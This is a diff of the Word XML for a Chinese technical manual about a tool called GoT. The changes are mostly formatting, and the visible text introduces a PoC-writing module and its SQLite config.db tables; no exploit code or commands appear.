--- a/GoT技术文档.docx
+++ b/GoT技术文档.docx
@@ -6,7 +6,7 @@
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:sz w:val="72"/>
           <w:szCs w:val="72"/>
         </w:rPr>
@@ -16,12 +16,11 @@
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:sz w:val="72"/>
           <w:szCs w:val="72"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
@@ -30,13 +29,12 @@
         </w:rPr>
         <w:t>GoT</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:sz w:val="72"/>
           <w:szCs w:val="72"/>
         </w:rPr>
@@ -50,126 +48,226 @@
         <w:t>技术文档</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>编写时间：</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>2024/</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>编写时间：</w:t>
+        <w:t>08</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -177,13 +275,24 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>2024/7/9</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>05</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:widowControl/>
         <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:br w:type="page"/>
@@ -217,7 +326,7 @@
           <w:pPr>
             <w:pStyle w:val="TOC"/>
             <w:rPr>
-              <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+              <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
               <w:color w:val="auto"/>
             </w:rPr>
           </w:pPr>
@@ -237,7 +346,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -319,7 +428,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -392,7 +501,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -465,7 +574,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -538,7 +647,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -611,7 +720,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -684,7 +793,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -757,7 +866,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -830,7 +939,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -903,7 +1012,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:cstheme="minorBidi"/>
+              <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:szCs w:val="24"/>
@@ -970,6 +1079,11 @@
           </w:hyperlink>
         </w:p>
         <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:hint="eastAsia"/>
+            </w:rPr>
+          </w:pPr>
           <w:r>
             <w:rPr>
               <w:b/>
@@ -981,53 +1095,173 @@
         </w:p>
       </w:sdtContent>
     </w:sdt>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
         <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc171467005"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>一，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>POC编写模块介绍</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
         </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc171467005"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>一，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>POC编写模块介绍</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
@@ -1035,7 +1269,7 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -1052,33 +1286,21 @@
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>数据库</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>sqlite</w:t>
+        <w:t>数据库sqlite</w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>sqllite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>数据库使用工具市面上有很多，这里我建议使用</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sqllite数据库使用工具市面上有很多，这里我建议使用</w:t>
       </w:r>
       <w:r>
         <w:t>DB Browser for SQLite</w:t>
@@ -1089,29 +1311,21 @@
         </w:rPr>
         <w:t>，下载地址：</w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText>HYPERLINK "https://sqlitebrowser.org/dl/"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="ae"/>
-        </w:rPr>
-        <w:t>https://sqlitebrowser.org/dl/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="ae"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ae"/>
+          </w:rPr>
+          <w:t>https://sqlitebrowser.org/dl/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1132,7 +1346,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1154,6 +1368,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1171,6 +1390,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1191,7 +1415,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1212,29 +1436,34 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc171467007"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc171467007"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1.2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
         <w:t>C</w:t>
       </w:r>
       <w:r>
@@ -1244,7 +1473,6 @@
         </w:rPr>
         <w:t>onfig.db</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
@@ -1255,28 +1483,24 @@
       <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>config.db</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中，存在三个表</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在config.db中，存在三个表</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1297,7 +1521,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1319,6 +1543,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>F</w:t>
       </w:r>
@@ -1330,7 +1559,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>S</w:t>
       </w:r>
@@ -1338,17 +1571,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>qlite_sequence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：不知道干什么的，突然出现的一个表，删不掉了</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>qlite_sequence：不知道干什么的，突然出现的一个表，删不掉了</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>V</w:t>
       </w:r>
@@ -1363,7 +1594,7 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -1385,6 +1616,11 @@
       <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1393,6 +1629,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1413,7 +1654,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1435,6 +1676,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1443,6 +1689,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1464,7 +1715,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1486,6 +1737,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1512,6 +1768,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1532,6 +1793,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
